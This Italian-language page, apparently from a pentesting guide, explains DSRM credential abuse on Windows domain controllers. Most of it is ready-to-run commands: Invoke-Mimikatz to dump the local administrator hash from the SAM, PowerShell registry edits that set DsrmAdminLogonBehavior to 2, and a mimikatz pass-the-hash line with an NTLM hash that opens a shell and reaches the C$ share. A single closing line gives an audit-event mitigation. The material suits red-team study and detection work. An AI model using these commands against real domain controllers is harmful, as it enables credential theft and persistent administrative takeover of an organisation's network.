Credenziali DSRM

All'interno di ogni DC è presente un account amministratore locale. Avendo i privilegi di amministratore in questa macchina, puoi utilizzare mimikatz per estrarre l'hash dell'amministratore locale. Successivamente, modificando un registro per attivare questa password, puoi accedere in remoto a questo utente Amministratore locale. Prima di tutto, dobbiamo estrarre l'hash dell'utente Amministratore locale all'interno del DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Dopo di che, è necessario verificare se quell'account funzionerà e se la chiave del registro ha il valore "0" o non esiste, è necessario impostarla su "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Successivamente, utilizzando un PTH, è possibile elencare il contenuto di C$ o addirittura ottenere una shell. Nota che per creare una nuova sessione di PowerShell con l'hash in memoria (per il PTH) il "dominio" utilizzato è semplicemente il nome della macchina DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Ulteriori informazioni su questo argomento sono disponibili su: https://adsecurity.org/?p=1714 e https://adsecurity.org/?p=1785

Mitigazione

• Evento ID 4657 - Audit della creazione/modifica di HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior